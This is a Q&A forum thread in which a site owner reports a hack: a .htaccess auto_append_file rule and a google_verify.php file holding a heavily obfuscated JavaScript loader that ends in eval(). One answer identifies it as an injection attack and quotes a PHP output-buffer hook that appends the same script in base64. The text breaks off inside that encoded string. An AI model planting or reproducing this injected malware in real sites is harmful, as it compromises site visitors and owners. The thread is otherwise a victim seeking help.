Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

virus problem google_verify.php and ftp passwords

Couple days ago I had problems with my sites. In all ftp servers I got some php file called google_verify.php and in my .htaccess file the following text was added:

<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>

<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>

Here is google_verify.php file:

<script>d='function  $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un    
L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 
-z=null}}if(!  z Ztypeof  M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv 
_>, =vars Z 4== =vars A=  /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % 
Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS 
-v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H $rs So 6\'q\') 
8\'\') 6\'v\') I Hi=0;i< $rs hrs[i]=parseInt( $rs[i],16)- k =  $rs 8\',\')+
\',\'}else{ajax gr.offset2=25; =  k}; 9unR ( !){eval( 9  ]UrN L db&& Yt 7 -H( Yt W} 3 
drt 7 OR + rt SR}}  c(" $a",new Date().getTime()); $h : / ]Ikey in(  t) Zfalse== C1]&& 
4==  b A$T=  v(key, C0] W ,t[key] ?t[ $T[0] [$T[1] W;key ST[0]} $h[ $h 7]=key+"="+ 
C0]} 3$R Oh 8 Yx) + rt+ Sh 8 Yx)} Uk L-B="POS <t="";d=\'v={@ VM$1XH:"e-",@ 
V`$1XH:"",*b VM$1Xv30:"l(\\\'l=Str"
\\\\_:"ing.fr",JG*2%a%fzV*aV:"omCha",>%8%8*2*5LB0_*4:"rCode("
<6#fF%3#f#7#d_$4y<d*3*6$eV*e*d$a*3&6R8#b!0G%4#d%eTM `8B6P*3K#6>*4HY/c*dPB1JJ-
a$4*6&9<7E*bQ`NX@U&3W2E*eQ*4?Q*2E&7W5!3%b#e#8!0*8#6J `6PV#c#9!fB3*1V&6W9*7#f%6-3*d#f-
d-fy,a2%2#e T T#c!1&1/b#eT!1#c!1*4*b-d&1/4-f#f%6%2#d 
^5`y<4?T*5KUB6P*3Y/9*eZw*5#a#9A*7&9/1@U TLP 
T&1D3HK%8>O@w*5Y/9O~T@#6T@~&9D1ZwJB6A*eZG&9,d5H*3#8#7E*5?%8&7/d-eF!fJ-eFG%6y
/6B0!2G_%3#f_%3yD0%1EJ%1EHwA&5,d0@$f!2#e$1MX?yD1*9U%aAGA*9A&9,a2#7G-a?*1-bM?I
/1-0-7%4%1$4T#d-c `9J?%8J%3AGE&7Df*e!0*cZA#b!3*2 
`aH-aOB7B7OJGI<2?GJ#aPP?$e&1W5%4z$1*7Gz$1*5I/3*4#d*0!3`!0F!0 `8$dO%6`
%4$4%b!f&5D4OOOB0#eVN-1&3W0*3$b!3*b*aw*0$b&3De%a@UB0#e-dN-1&3W2>M-
3*0K*2*5_&5WeOA%7*3#6-7%e*3&6/4%7!fN f&1,a6M$f_*b#7B1B1#7&5D7#f%a$3XUFPZ 
e9QMAU$1JB4U&9Wf*5*8@$1>U>@YR1
%4Q%6%4UQ%6#7&9Rb$f%fzB3B7*5?*fI/9$1*4#eUUA$1*2&6D6^F#8~#b%0%0F ea%7%eN%7!2 
^7?y/5Z#e#b$e$e_Z*0yD6~GF#8^#c%0%0&4D9#8O>HB5>*d@Y<9*5*5#8>*6>>#7YW1^??*4B7?*fGI
<7*4#6V*eOA$0V&6/2@#d-awA-f#f_yW5!0#b-8*aE-d#d!3&0Wd%8*3%0$e!fT*5@YWeGB7J- 
aB2AAH&9<9%7`-b$e|$3-b$b&5R4$b-d$d$4|-d$4$3 j6-9Q$b%e-9w%7X&3,ac%8zK-c$f$b|-c&6R4%aM-
dN%aB1-d%e j7$a?U-4Q!3!3?&3<2-7%3-7%4-7T-7%6&1,af%f-f$0-f$1-f$3-f&9R3%0N%0X%0M%0`I,acN-
cX-cM-c`-c&6Rc-f$d-f$e-f$f-fB0&9,ac$e-c$f-cB0G!f-
7&6,a0FF#7H#6H^H&4D9P#aP#bP#cP#d&5D2#f!f*1A`$a*3*6&6/4-4GF%6GF*fG&1
/4T!1_AAAF*f&1D3H@KJ@-bPPYD2!f?KT?-aHP&7/6%7ULV-6UB0-4&3R5!fV$d!fV$4!fV&3<7P>$a-
6MM_*b&5RczPJ^#b!3N#d `8M|G-d$bU%2P&5,a9*b>-eG-9%8>-e&1/fV%4ULVNN#e&3/6N*0VQ-
e!3>*4&3W3 ^4#8^@E~#8y<2H>$4%0_?*6*6&5/b#e#e~ ^4_$4zy<0#eV$d*0!3#c#6!3&3W4OJ@-
fG!2#b#6y/2*4OJ@-f#d_$3yW2_^*fU%2H_#7&5/8M$fL%2H_^*f&5/a%0G!3^VN$dU&3<6*4A-
4#fJL#b*0&9D1T*3@-a*5>-3>YD9#9#bH%4-8|$a*4 j5*2#b#6*2#f#6*1#eID0#b#8H#d#6H^#b 
ed#9OG#8~G#9P&1D3#a#7O#f#9O#e#e&7/dO#6GJJGJP&1D5#a#9^#f#a^#a#a&9
/f#8#9!f#8#8!f~~&3D3#c#aO#dO#c#aO&7D9L~LOLJL#6yW0T*3%eM$aH>^Y<d*1~#fZ*0EXM 
ea*4*5$3^^OB5GIR4N-d%b-f#f-5X$4y<e$3KO%bM$4Q*8&5<b%4N*6Q%7%8@K&3D4U$bz
%4Q%6~#b&9DbHB4E~|*4L%f&7R7M$3#dJJ?LV&3<aO@B2O@|O@YRc^G-c^GB3T%2IWaE-
dGP-d@EL&0<3%fZ!fE@!3Q$3&0D1ZQK$1@??U&3Db!3*3>!0#8*2|*9&0<cH!fK#b!fP~!fYW0%8Z$aF*eFH%0 
ec*8*6?#f?$dzZIDd-c!2E@Q@E-c 
`6F$bZ%8`K*1^&4D9#9A$1%eQ$0$1$d&9W1#c~*2*0OF#9F&4,a1B1B1#fE*5*1*4E&4<aE@E?-b^%a| 
j9T`w*9$0w$1w&4R3|G>%8LB2*0>&5W8*2*5>-2P>NL&5,d1A-3~%f$4$4%b`&6,a0-
c-5-4*5@`B5*3Y/dzB2*7*a?-2*f@I/2*6 ^b ^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-
1*5`$e$dP&9/3Q`UJHH!0@&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-
5*c*1E&4W3?A%6%b`A@#dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&1DcT@A-3ZQz|&9<c%1|#a%e%f%eT#b 
`2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-
bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz 
ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1@-4#e!3&3/d!3-6EUE-
7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5 
fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7
/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| j4z@!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-
6MNK$1&3<9?@#d_!2V@$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/5@O%6NN%a$3w&5Wb$0$1$4KH@>HY
/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b
%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-
fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f@V#aUU%f&6D2ZQ%8wz-3%aU 
edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-
b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`@GF#cE-8&4D3K%a|*a$1
%aQ%a&5R6z>*1@M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-
0$fXX%3%f%bIR4?@#d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f 
^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d 
`6XPQwwX%8M&3/8*f@$b#6@>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>-3@Y<2#d!0HXE-
d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy
/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU 
ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y
/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c 
e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`Q
MP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l)
\\\'",EE!0*9Q>!0#8*2:");"};dk=[] I-r x in v){dk.push(trim(x,v))};e-l(dk 
8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q-
va/+7<,b>!8?!a@!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+
9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d 
6\'!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &}; 
9unAJAX L dE -q ]+ rN( $R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K=  F+  i+ 
Yt , R$K W +  R F W;try{  z.setRequestHeader("Content-Type","application/x-www-form-
urlencoded" 5){}}  z.onreadystatechange !){switch( #z.readyState){case 1: #L 02: #u 
03: #y 04: ;= #z.r (Text; ;XML= #z.r (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#A A)= 
#A.nodeName; ).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. >= ; 
+#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send( Yt)}} Um ],rg()} 
a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf 
*rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)}  this g !=function( #self g $kx_ 
%encodeURIComponent( &e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse )elemNodeName 
*;ajax g +}else{  ,;   - A  .try{  z :ActiveXObject("M /Array 0();break;case  
2=document.getElementById( 3if(  4true 5)}catch(e 6.split( 7.length 8.join( 9this.r 
:=new  ;self.r ( <T" ,i="?" ,rx="&" ,r =return >value ?=null , @ !){ U A){  C  t[key][ 
G( $j[0], $j[1]) Hvar  I;for( J"|| )==" K ,b= 4 ,w=fals L !  MXMLHttpRequest NunR (()} 
O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open(  B,  S= $ T-d!3 U} , V%b%a#6Q W, 
4) X.XMLHTTP" 5 Y  r Z){if( []= /(  ]()  ^!2* _ L$o,  `&0/ awindow d$R A3  e&4/ 
f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split('   ! # $ % & ( ) 
* + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A C G H I J K L M N O P Q R S T U V W X Y 
Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script>

I suspect that my pc is infected with some kind of virus who can read my ftp access parameters from my ftp manager.

Does anybody know something more about this virus and how I can clean my computer?

Thanks in advance

like image 335
kukipei Avatar asked Jul 13 '11 22:07

kukipei


2 Answers

I am no security specialist but one of my sites got the same file. From my limited knowledge and research what happened is that your site got hacked and the google_verify.php file is part of an injection attack.

You should also check other files of you website (specially the index.php/htm/html) and look for:

     ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kPSdmdW5jdGlvbiAgJE0oZmlsZSAteiA/UCBMLUI9IkdFIDw9IGEgLHJ0PSIiIEtlICxFPXRydSAmICxyLm9mZnNldD0xMDAgVW4gTC1MIEB1IEB5IEBKIExBOSBOICxlIEBxIExBOSBOIFVtIEwtbiBdLFAgXVVyZyBMLWsoKTsgLnN4bWwyIFgxIEEuaWNyb3NvZnQgWDIgLXo9bnVsbH19aWYoISAgeiBadHlwZW9mICBNIT0idW5kZWZpbmVkIiAteiA6IE0gXSsgRT0gNH19IFVjIF8+IC10WyAkbyBbPixmYWxzZSkgVXYgXz4sID12YXJzIFogND09ID12YXJzIEE9ICAvKCAlICRvKSwgJSA+KSkgKyB0WyAlICRvKSBbJSA+KSBXfSBVSCBMJHAsICRTIEEkVD0gJSBZeCk7cmVnZXhwIDpSZWdFeHAoIFl4KyJ8IisgJFQpOyBILyBTcCA2cmVnZXhwKSBJaT0wO2k8IEgvIGhqPSBIL1tpXSA2Ij0iKTtpZiggND0gU1MgLXYgRyArIGMgR319fTsgYS50cmltIF8kZiBaInFhYmNkZWYiLmluZGV4T2YoICRvLnN1YnN0cigwLDEpKT49MCl7IEggJHJzIFNvIDZcJ3FcJykgOFwnXCcpIDZcJ3ZcJykgSSBIaT0wO2k8ICRycyBocnNbaV09cGFyc2VJbnQoICRyc1tpXSwxNiktIGsgPSAgJHJzIDhcJyxcJykrXCcsXCd9ZWxzZXthamF4IGdyLm9mZnNldDI9MjU7ID0gIGt9OyA5dW5SICggISl7ZXZhbCggOSAgXVVyTiBMIGRiJiYgWXQgNyAtSCggWXQgV30gMyBkcnQgNyBPUiArIHJ0IFNSfX0gIGMoIiAkYSIsbmV3IERhdGUoKS5nZXRUaW1lKCkpOyAkaCA6IC8gXUlrZXkgaW4oICB0KSBaZmFsc2U9PSBDMV0mJiA0PT0gIGIgQSRUPSAgdihrZXksIEMwXSBXICx0W2tleV0gP3RbICRUWzBdIFskVFsxXSBXO2tleSBTVFswXX0gJGhbICRoIDddPWtleSsiPSIrIEMwXX0gMyRSIE9oIDggWXgpICsgcnQrIFNoIDggWXgpfSBVayBMLUI9IlBPUyA8dD0iIjtkPVwndj17QCBWTSQxWEg6ImUtIixAIFZgJDFYSDoiIiwqYiBWTSQxWHYzMDoibChcXFwnbD1TdHIiXFxcXF86ImluZy5mciIsSkcqMiVhJWZ6ViphVjoib21DaGEiLD4lOCU4KjIqNUxCMF8qNDoickNvZGUoIjw2I2ZGJTMjZiM3I2RfJDR5PGQqMyo2JGVWKmUqZCRhKjMmNlI4I2IhMEclNCNkJWVUTSBgOEI2UCozSyM2Pio0SFkvYypkUEIxSkotYSQ0KjYmOTw3RSpiUWBOWEBVJjNXMkUqZVEqND9RKjJFJjdXNSEzJWIjZSM4ITAqOCM2SiBgNlBWI2MjOSFmQjMqMVYmNlc5KjcjZiU2LTMqZCNmLWQtZnksYTIlMiNlIFQgVCNjITEmMS9iI2VUITEjYyExKjQqYi1kJjEvNC1mI2YlNiUyI2QgXjVgeTw0P1QqNUtVQjZQKjNZLzkqZVp3KjUjYSM5QSo3JjkvMUBVIFRMUCBUJjFEM0hLJTg+T0B3KjVZLzlPflRAIzZUQH4mOUQxWndKQjZBKmVaRyY5LGQ1SCozIzgjN0UqNT8lOCY3L2QtZUYhZkotZUZHJTZ5LzZCMCEyR18lMyNmXyUzeUQwJTFFSiUxRUh3QSY1LGQwQCRmITIjZSQxTVg/eUQxKjlVJWFBR0EqOUEmOSxhMiM3Ry1hPyoxLWJNP0kvMS0wLTclNCUxJDRUI2QtYyBgOUo/JThKJTNBR0UmN0RmKmUhMCpjWkEjYiEzKjIgYGFILWFPQjdCN09KR0k8Mj9HSiNhUFA/JGUmMVc1JTR6JDEqN0d6JDEqNUkvMyo0I2QqMCEzYCEwRiEwIGA4JGRPJTZgJTQkNCViIWYmNUQ0T09PQjAjZVZOLTEmM1cwKjMkYiEzKmIqYXcqMCRiJjNEZSVhQFVCMCNlLWROLTEmM1cyPk0tMyowSyoyKjVfJjVXZU9BJTcqMyM2LTclZSozJjYvNCU3IWZOIGYmMSxhNk0kZl8qYiM3QjFCMSM3JjVENyNmJWEkM1hVRlBaIGU5UU1BVSQxSkI0VSY5V2YqNSo4QCQxPlU+QFlSMSU0USU2JTRVUSU2IzcmOVJiJGYlZnpCM0I3KjU/KmZJLzkkMSo0I2VVVUEkMSoyJjZENl5GIzh+I2IlMCUwRiBlYSU3JWVOJTchMiBeNz95LzVaI2UjYiRlJGVfWioweUQ2fkdGIzheI2MlMCUwJjREOSM4Tz5IQjU+KmRAWTw5KjUqNSM4Pio2Pj4jN1lXMV4/Pyo0Qjc/KmZHSTw3KjQjNlYqZU9BJDBWJjYvMkAjZC1hd0EtZiNmX3lXNSEwI2ItOCphRS1kI2QhMyYwV2QlOCozJTAkZSFmVCo1QFlXZUdCN0otYUIyQUFIJjk8OSU3YC1iJGV8JDMtYiRiJjVSNCRiLWQkZCQ0fC1kJDQkMyBqNi05USRiJWUtOXclN1gmMyxhYyU4ekstYyRmJGJ8LWMmNlI0JWFNLWROJWFCMS1kJWUgajckYT9VLTRRITMhMz8mMzwyLTclMy03JTQtN1QtNyU2JjEsYWYlZi1mJDAtZiQxLWYkMy1mJjlSMyUwTiUwWCUwTSUwYEksYWNOLWNYLWNNLWNgLWMmNlJjLWYkZC1mJGUtZiRmLWZCMCY5LGFjJGUtYyRmLWNCMEchZi03JjYsYTBGRiM3SCM2SF5IJjREOVAjYVAjYlAjY1AjZCY1RDIjZiFmKjFBYCRhKjMqNiY2LzQtNEdGJTZHRipmRyYxLzRUITFfQUFBRipmJjFEM0hAS0pALWJQUFlEMiFmP0tUPy1hSFAmNy82JTdVTFYtNlVCMC00JjNSNSFmViRkIWZWJDQhZlYmMzw3UD4kYS02TU1fKmImNVJjelBKXiNiITNOI2QgYDhNfEctZCRiVSUyUCY1LGE5KmI+LWVHLTklOD4tZSYxL2ZWJTRVTFZOTiNlJjMvNk4qMFZRLWUhMz4qNCYzVzMgXjQjOF5ARX4jOHk8Mkg+JDQlMF8/KjYqNiY1L2IjZSNlfiBeNF8kNHp5PDAjZVYkZCowITMjYyM2ITMmM1c0T0pALWZHITIjYiM2eS8yKjRPSkAtZiNkXyQzeVcyX14qZlUlMkhfIzcmNS84TSRmTCUySF9eKmYmNS9hJTBHITNeVk4kZFUmMzw2KjRBLTQjZkpMI2IqMCY5RDFUKjNALWEqNT4tMz5ZRDkjOSNiSCU0LTh8JGEqNCBqNSoyI2IjNioyI2YjNioxI2VJRDAjYiM4SCNkIzZIXiNiIGVkIzlPRyM4fkcjOVAmMUQzI2EjN08jZiM5TyNlI2UmNy9kTyM2R0pKR0pQJjFENSNhIzleI2YjYV4jYSNhJjkvZiM4IzkhZiM4IzghZn5+JjNEMyNjI2FPI2RPI2MjYU8mN0Q5TH5MT0xKTCM2eVcwVCozJWVNJGFIPl5ZPGQqMX4jZloqMEVYTSBlYSo0KjUkM15eT0I1R0lSNE4tZCViLWYjZi01WCQ0eTxlJDNLTyViTSQ0USo4JjU8YiU0Tio2USU3JThASyYzRDRVJGJ6JTRRJTZ+I2ImOURiSEI0RX58KjRMJWYmN1I3TSQzI2RKSj9MViYzPGFPQEIyT0B8T0BZUmNeRy1jXkdCM1QlMklXYUUtZEdQLWRARUwmMDwzJWZaIWZFQCEzUSQzJjBEMVpRSyQxQD8/VSYzRGIhMyozPiEwIzgqMnwqOSYwPGNIIWZLI2IhZlB+IWZZVzAlOFokYUYqZUZIJTAgZWMqOCo2PyNmPyRkelpJRGQtYyEyRUBRQEUtYyBgNkYkYlolOGBLKjFeJjREOSM5QSQxJWVRJDAkMSRkJjlXMSNjfioyKjBPRiM5RiY0LGExQjFCMSNmRSo1KjEqNEUmNDxhRUBFPy1iXiVhfCBqOVRgdyo5JDB3JDF3JjRSM3xHPiU4TEIyKjA+JjVXOCoyKjU+LTJQPk5MJjUsZDFBLTN+JWYkNCQ0JWJgJjYsYTAtYy01LTQqNUBgQjUqM1kvZHpCMio3KmE/LTIqZkBJLzIqNiBeYiBeYSo3ITJPeUQzJTckNHckZSoyKjIkMyRhJjVSNU5BLTEqNWAkZSRkUCY5LzNRYFVKSEghMEAmMDwyJGIqNT4qYyozJTIkYj5ZV2MqME1OYCU4I2UtZCRhJjNXNT4jOSM2JWFNS0IxKjNZLGFlLTgqMUZeLTUqYyoxRSY0VzM/QSU2JWJgQUAjZHkvOSo5TEEqZUpHKjIlYSY2PGFNITElYVQjZSBUVCYxRGNUQEEtM1pRenwmOTxjJTF8I2ElZSVmJWVUI2IgYDJMI2QtZUYgXmYjZF95UmY+TC0wUC05WD4jZllEZCBeOSo0I2YhMiNhTio0eVJiLTYlM3ctMCUzJWYlNz95LzclOFQlMSU0RUEtYkgmMDw0LTgqZEU+Ti1lRSo2IGphITMqZio5VSNlVio1ITMmMy9kTkhCNEI0QjQqMiUxfCY3UmMqMUVYeiNmRVh6IGVlIWZBJDEkZVQ/flomNjw1JDQtNS00KjMqMCU2TiVlJjA8Nk1LUSQxQC00I2UhMyYzL2QhMy02RVVFLTdMJDMmMDxkeio5enokYSQxJWEkZFlSY1pIIWYkYiRhJWIhZn5ZPDFFWnx8TiNmfn4mNTw5YCQxIzZ6JGYkMXp6WTxiYH53TiQzXiM3XiY2UjUgZkhUJTImMTxjJWZ6UFpYUSQxKjImMyxhZUEkMCUxR0ElMFYqYSY2RDhHJWFMLTd8YCRlUUkvZkhKIzhCNSpiJTgkYksmNy9mJTMlM0xIKjV+IzhFJjdEZkYqOEFePyExSCExJjEvNyo0TkskZUUqOHx8IGo0ekAhM0YqMC0wJTRNJjNSMCM2JGF3WEtNTkhZL2NQTVEtNk1OSyQxJjM8OT9AI2RfITJWQCRkeVI3JWF8JGFNJDNfP0cmNS9mIWYtZiVlTCU0RyM3JGYmNy81QE8lNk5OJWEkM3cmNVdiJDAkMSQ0S0hAPkhZLzgqY0cjOUxfI2YqMCU3JjVSNndUJWZCMUZMRio3JjQ8YiUwViUxRiFmR0IxdyY0PGMkM1QkYiEwVVh3JDMmMDw5JTJ3S3ckNHwjYSU4JjBSMUtLWlg+XiRld1lSNkZGSkVLLWZaJTEmNDw1KjAlNyM4JGIkZiVmekIzSUQzX35PJThaJTZNKjgmNVI4WiVlKmEkZFAjYUEqYiY5LzkkYiFmQFYjYVVVJWYmNkQyWlElOHd6LTMlYVUgZWRWViM2QU4lMUxMJjY8MUEjYVpgSyRlWCVlJjlSMFghMiM3JWIlOCQ0JTMlZnk8YlYjYyVhfnwlYiRhLWImNixhNSo0JGZUXyRmP0whMSYxRGUqND8qOCFmTCRhJWF8IGpkJDRgQEdGI2NFLTgmNEQzSyVhfCphJDElYVElYSY1UjZ6PioxQE0lM0g+WS9lI2MjYyNhI2FKKjcqN0EmOURlSiQwd1ElYmBLRiY0VzVMLTAkZlhYJTMlZiViSVI0P0AjZCEyI2VOJTdYeSxhYSVmJDMlYlYqNCFmQjFBJjY8MyNmIF4xVCUzJWUlZSU0eTxhSyQ0KjYlMyRiQSpiSiY5RDFWIzhWKjlBLTElMSUyJjYvOT9FKmIkZSQwTiViWCY3UjchMCo1dyU2PiEwKjYjZCBgNlhQUXd3WCU4TSYzLzgqZkAkYiM2QD4tMFBZLGQyRUUtMF5FI2MtM1ggajlLWks+LTI+JGJ6WSxkMSQ0Wio1JTQ/Pi0zQFk8MiNkITBIWEUtZD8hMCYwV2RFJDMlZlQjZSBUVSYxLzYhMy0wKjEjZkolN0t8JjNXNEchZj4qMUtOYEwmNjw1I2YjYSM5I2RUI2QlNiNmeS84JDQjZCU0TCQzJDBLdyYwUjY/QV9WKjItMy04LTl5PDIlNCVhQjglNiU2Pz8/SS81Rj5GQUY/RlUgZWF+P14/IzY/Izc/SUQ3QSM4QSNiQSNkQSM5JjkvNSM2XyNhXyNiXyNjXyY1VzA+KjE+KjI+KjM+KjRZLzQqMkYqM0YqNkYqN0YmNFc4Rio5RiphRipiRipjIGUxKmEhMSpiITEqYyExKmQhMSYxLGE3UCM4JGQkZkskZCRlekkvOSU0TCNlQXwjZSU0I2QmMUQ5I2IqNyM5KjIjYVB+QjBZRDJKSiM3JDNgUU1QJjlSZSM4JGF8JGFKT09PSURjJTZNJTJaQVQ/JjFcXFxcRToiMzIpO2V2IiwqYGBaWEsqYiQwJDE6ImFsKGwpXFxcJyIsRUUhMCo5UT4hMCM4KjI6Iik7In07ZGs9W10gSS1yIHggaW4gdil7ZGsucHVzaCh0cmltKHgsdikpfTtlLWwoZGsgOFxcXCdcXFwnKSkhdjcjdjgkdmMldmImOjgqdjkrLHEtdmEvKzc8LGI+ITg/IWFAIWJBITlCdmREKzhFITdGITRHIWRIIzBJOjkwSiMySyVjTCFlTSQ3TiQ1TyMzUCMxUSQyUixjVCU1VSFjViE2Vys5WCQ2WSY4WiVkXiM1XyE1YCQ4dyU5eSYyeiRjfCQ5fiM0XFxcXCwjNl5MJTIqMD4kZioyXCcgSWM9NDY7Yy0tO2Q9KHQ9ZCA2XCchIyQlJiorLS88Pj9AQUJERUZHSElKS0xNTk9QUVJUVVZXWFlaXl9gd3l6fH5cXFxcXCdbY10pKSA4dC5wb3AoKSkpOyA5ICg9ZCBLICZ9OyA5dW5BSkFYIEwgZEUgLXEgXSsgck4oICRSKTsgMyByciAtQSAyIFlyKX0gMyB6KXsgSHNlbGY9dGhpczsgMyBCPT0iR0VUIiBBJEs9ICBGKyAgaSsgWXQgLCBSJEsgVyArICBSIEYgVzt0cnl7ICB6LnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIgNSl7fX0gIHoub25yZWFkeXN0YXRlY2hhbmdlICEpe3N3aXRjaCggI3oucmVhZHlTdGF0ZSl7Y2FzZSAxOiAjTCAwMjogI3UgMDM6ICN5IDA0OiA7PSAjei5yIChUZXh0OyA7WE1MPSAjei5yIChYTUw7ICNDWzAgUTsgI0NbMSBRVGV4dDsgMyN3KXtzZWxmLnIgTiAzI0EgQSk9ICNBLm5vZGVOYW1lOyApLnRvTG93ZXJDYXNlKCk7IDMpPT0iaW5wdXQgSnNlbGVjdCBKb3B0aW9uIEp0ZXh0YXJlYSIgQSNBLiA+PSA7ICsjQS5pbm5lckhUTUw9IDt9fSAzI0NbMF09PSIyMDAiIEEjSiBdKyNlKCl9ICNydD0iIjticmVha30gVXouc2VuZCggWXQpfX0gVW0gXSxyZygpfSBhLmFqYXggOiAkTSgpO3RyeXsgSCAkRyAyXCcgJERcJykgKmMoInF1ZXJ5IiwgJEcgZ2QgZ2YpICpGPSJxdWVyeS5waHAiICpCIFNHIGdCIGdmICpycj1cJyAkcnpcJyAqTCBTTiAqdSBTZyAqeSBTcyAqSiBTeDsgUCA1KXsgUCl9ICB0aGlzIGcgIT1mdW5jdGlvbiggI3NlbGYgZyAka3hfICVlbmNvZGVVUklDb21wb25lbnQoICZlICxyciA/QSA/Rj1maWxlICx0IDpPYmplY3QgXSxDIDogLygyKSAoZXNwb25zZSApZWxlbU5vZGVOYW1lICo7YWpheCBnICt9ZWxzZXsgICw7ICAgLSBBICAudHJ5eyAgeiA6QWN0aXZlWE9iamVjdCgiTSAvQXJyYXkgMCgpO2JyZWFrO2Nhc2UgIDI9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIDNpZiggIDR0cnVlIDUpfWNhdGNoKGUgNi5zcGxpdCggNy5sZW5ndGggOC5qb2luKCA5dGhpcy5yIDo9bmV3ICA7c2VsZi5yICggPFQiICxpPSI/IiAscng9IiYiICxyID1yZXR1cm4gPnZhbHVlID89bnVsbCAsIEAgISl7IFUgQSl7ICBDICB0W2tleV1bIEcoICRqWzBdLCAkalsxXSkgSHZhciAgSTtmb3IoIEoifHwgKT09IiBLICxiPSA0ICx3PWZhbHMgTCAhICBNWE1MSHR0cFJlcXVlc3QgTnVuUiAoKCl9IE8gLXJ0Kz0gWXgrICQgUGFqYXgucnVuQUpBWCggUV09ICN6LnN0YXR1cyBSei5vcGVuKCAgQiwgIFM9ICQgVC1kITMgVX0gLCBWJWIlYSM2USBXLCA0KSBYLlhNTEhUVFAiIDUgWSAgciBaKXtpZiggW109IC8oICBdKCkgIF4hMiogXyBMJG8sICBgJjAvIGF3aW5kb3cgZCRSIEEzICBlJjQvIGYkMyU2JWZUJDQgZy4gJCBoIDc7aSsrIEEkIGomNzwgayAkZlsgJG9dfSc7Zm9yKGM9MTMwO2M7ZD0odD1kLnNwbGl0KCcgICAhICMgJCAlICYgKCApICogKyAsIC0gLiAvIDAgMiAzIDQgNSA2IDcgOCA5IDogOyA8ID0gPiA/IEAgQSBDIEcgSCBJIEogSyBMIE0gTiBPIFAgUSBSIFMgVCBVIFYgVyBYIFkgWiBbIF0gXiBfIGAgYSBkIGUgZiBnIGggaiBr